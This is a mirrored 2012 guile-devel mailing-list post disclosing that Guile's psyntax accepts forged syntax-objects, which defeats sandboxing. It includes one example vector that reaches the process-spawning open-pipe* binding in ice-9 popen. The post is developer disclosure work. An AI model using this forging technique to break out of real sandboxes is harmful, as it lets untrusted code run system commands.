unofficial mirror of guile-devel@gnu.org 
 help / color / mirror / Atom feed
* Psyntax security hole prevents secure sandboxing in Guile
@ 2012-05-06 18:17 Mark H Weaver
  2012-05-07 11:58 ` Noah Lavine
  2012-05-07 16:31 ` Ludovic Courtès
  0 siblings, 2 replies; 7+ messages in thread
From: Mark H Weaver @ 2012-05-06 18:17 UTC (permalink / raw)
  To: guile-devel

Hello all,

Every once in a while someone asks about secure sandboxing with Guile,
and generally the response is that it should be fairly easy, by creating
a module with carefully selected bindings, but there's nothing ready
"out of the box".

I just realized that psyntax has a security hole that prevents secure
sandboxing, and wanted to post this fact before it was forgotten.

The problem is that psyntax accepts syntax-objects in the input, and
syntax-objects are simply vectors (or sexps containing vectors).
Therefore, it is always possible to _forge_ syntax-objects that refer to
arbitrary bindings in arbitrary modules, even if the usual bindings of
'@' and '@@' are not available.

In particular (although this is an internal implementation detail that
you cannot rely upon!) in Guile 2.0 the following two expressions are
treated equivalently:

  (@@ (ice-9 popen) open-pipe*)

  #(syntax-object open-pipe* ((top)) (hygiene ice-9 popen))

I don't think we can plug this hole until 2.2.

     Mark



^ permalink raw reply	[flat|nested] 7+ messages in thread

end of thread, other threads:[~2012-05-08 14:41 UTC | newest]

Thread overview: 7+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2012-05-06 18:17 Psyntax security hole prevents secure sandboxing in Guile Mark H Weaver
2012-05-07 11:58 ` Noah Lavine
2012-05-07 16:31 ` Ludovic Courtès
2012-05-07 17:44   ` Mark H Weaver
2012-05-07 18:25     ` Noah Lavine
2012-05-07 20:10       ` Andreas Rottmann
2012-05-08 14:41     ` Ludovic Courtès

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).